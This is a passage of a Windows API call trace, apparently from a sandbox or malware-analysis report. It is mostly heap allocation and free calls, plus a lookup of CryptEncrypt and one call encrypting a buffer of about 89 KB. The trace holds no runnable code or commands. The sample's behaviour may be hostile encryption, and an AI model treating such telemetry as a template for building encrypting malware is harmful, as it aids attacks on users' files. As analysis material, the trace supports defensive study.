Flags=0x0, Size=0x10) returned 0x2e50c50 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0149.376] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0149.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0149.377] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.377] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15cf0) returned 0x2eabd28 [0149.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eabd28 | out: hHeap=0x970000) returned 1 [0149.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0149.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0149.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0149.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0149.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0149.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0149.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0149.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0149.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0149.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0149.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0149.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0149.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c80 [0149.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0149.387] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0149.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0149.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e542b0 [0149.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0149.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0149.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0149.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0149.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0149.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0149.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0149.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0149.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0149.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0149.388] CryptEncrypt (in: hKey=0xa87710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e96028*, pdwDataLen=0x8cef60*=0x15cf0, dwBufLen=0x15cf8 | out: pbData=0x2e96028*, pdwDataLen=0x8cef60*=0x15cf8) returned 1 [0149.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0149.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0149.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0149.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0149.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0149.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0149.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0149.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.488] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0149.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0149.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0149.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0149.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0149.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0149.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0149.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0149.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0149.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0149.489] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0149.489] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0149.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0149.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0149.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0149.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0149.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0149.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0149.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0149.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0149.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0149.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0149.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0149.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | 